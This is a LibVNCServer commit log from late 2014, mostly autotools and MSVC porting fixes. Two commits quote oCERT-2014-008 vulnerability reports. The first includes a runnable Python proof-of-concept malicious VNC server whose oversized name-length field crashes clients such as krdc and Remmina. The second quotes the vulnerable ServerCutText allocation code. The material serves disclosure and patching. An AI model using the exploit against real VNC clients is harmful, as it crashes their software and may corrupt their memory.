- 10 Oct, 2014 2 commits
-
-
Christian Beier authored
This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client. Field Size --------------------------------- name-length [4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02" conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01" conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel = 0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM = 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding = "\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF + "\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString ) c.close()
-
Christian Beier authored
Fixes (maybe amongst others) the following oCERT report ([oCERT-2014-008]): LibVNCServer HandleRFBServerMessage rfbServerCutText malicious msg.sct.length It looks like there may be a chance for potential memory corruption when a LibVNCServer client attempts to process a Server Cut Text message. case rfbServerCutText: { char *buffer; if (!ReadFromRFBServer(client, ((char *)&msg) + 1, sz_rfbServerCutTextMsg - 1)) return FALSE; msg.sct.length = rfbClientSwap32IfLE(msg.sct.length); << Retrieve malicious length buffer = malloc(msg.sct.length+1); << Allocate buffer. Can return 0x0 if (!ReadFromRFBServer(client, buffer, msg.sct.length)) << Attempt to write to buffer return FALSE; buffer[msg.sct.length] = 0; << Attempt to write to buffer if (client->GotXCutText) client->GotXCutText(client, buffer, msg.sct.length); << Attempt to write to buffer free(buffer); break; } If a message is provided with an extremely large size it is possible to cause the malloc to fail, further leading to an attempt to write 0x0.
-
- 09 Oct, 2014 2 commits
-
-
Christian Beier authored
-
Christian Beier authored
-
- 07 Oct, 2014 5 commits
-
-
dscho authored
Add autoconf macros that might not be installed with a usual autotools setup
-
Christian Beier authored
This is recommended practice as per https://www.gnu.org/software/automake/manual/html_node/Local-Macros.html. It fixes the problem that arose when one of the maintainers could not build LibVNCServer after https://github.com/LibVNC/libvncserver/pull/38 was merged. Symptoms included checking whether make sets $(MAKE)... yes ./configure: line 2481: syntax error near unexpected token `rfb/rfbconfig.h' ./configure: line 2481: `AX_PREFIX_CONFIG_H(rfb/rfbconfig.h)' until autoconf-archive was installed (which was a previously unmentioned requirement for Pull Request #38) – this is not always an option, in particular when the project needs to be built using a system-wide autoconf installation that cannot be modified easily by the developer.
-
Johannes Schindelin authored
There was no reason to get rid of the convenient script. Most developers who are not in love with autoconf fail to remember that autoreconf invocation, therefore it is better to have something working in place. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
-
Nicolas Ruff authored
There was a possible buffer overflow in rfbFileTransferOffer message when processing the FileTime. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
-
dscho authored
Fixing 2 security issues
-
- 06 Oct, 2014 3 commits
-
-
newsoft authored
-
newsoft authored
-
Christian Beier authored
Otherwise the sources from a 'make dist' package wouldn't compile.
-
- 03 Oct, 2014 1 commit
-
-
Christian Beier authored
This change kinda got lost with the last commit re-splitting.
-
- 02 Oct, 2014 8 commits
-
-
Christian Beier authored
Autotools fix revisited.
-
Christian Beier authored
.dirstamp, OTOH, is to be expected in several subdirectories.
-
-
Brian Bidulock authored
-
Brian Bidulock authored
- no longer applicable: use autoreconf -fiv
-
Christian Beier authored
-
Brian Bidulock authored
-
Brian Bidulock authored
-
- 30 Sep, 2014 4 commits
-
-
Johannes Schindelin authored
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
-
dscho authored
A forgotten `#ifdef WIN32` broke UNIX build.
-
Daniel Cohen Gindi authored
-
dscho authored
More MSVC adjustments, now focuses on the libvncserver
-
- 20 Sep, 2014 13 commits
-
-
Daniel Cohen Gindi authored
-
Daniel Cohen Gindi authored
-
Daniel Cohen Gindi authored
-
Daniel Cohen Gindi authored
We also do not need the conversion between UNIX values to Windows values in the RTF_FIND_DATA struct, as we already are on windows.
-
Daniel Cohen Gindi authored
-
Daniel Cohen Gindi authored
The additional compat_mkdir function was not necessary at all.
-
Daniel Cohen Gindi authored
`windows.h` is referring to `winsock.h` (unless the `WIN32_LEAN_AND_MEAN` is defined). The structs used in this header are defined in `winsock2.h` or in `winsock.h`, but we are using Winsock2 of course! So we have to include winsock2.h and refrain from including windows.h here
-
Daniel Cohen Gindi authored
-
Daniel Cohen Gindi authored
Basically taken from https://github.com/danielgindi/FileDir with some adjustments
-
Daniel Cohen Gindi authored
-
Daniel Cohen Gindi authored
-
Daniel Cohen Gindi authored
Passing NULL to sprintf() would most likely crash the program.
-
Daniel Cohen Gindi authored
`strings.h` and `resolv.h` are not available on MSVC, and some POSIX functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
-
- 09 Sep, 2014 2 commits
-
-
Christian Beier authored
-
-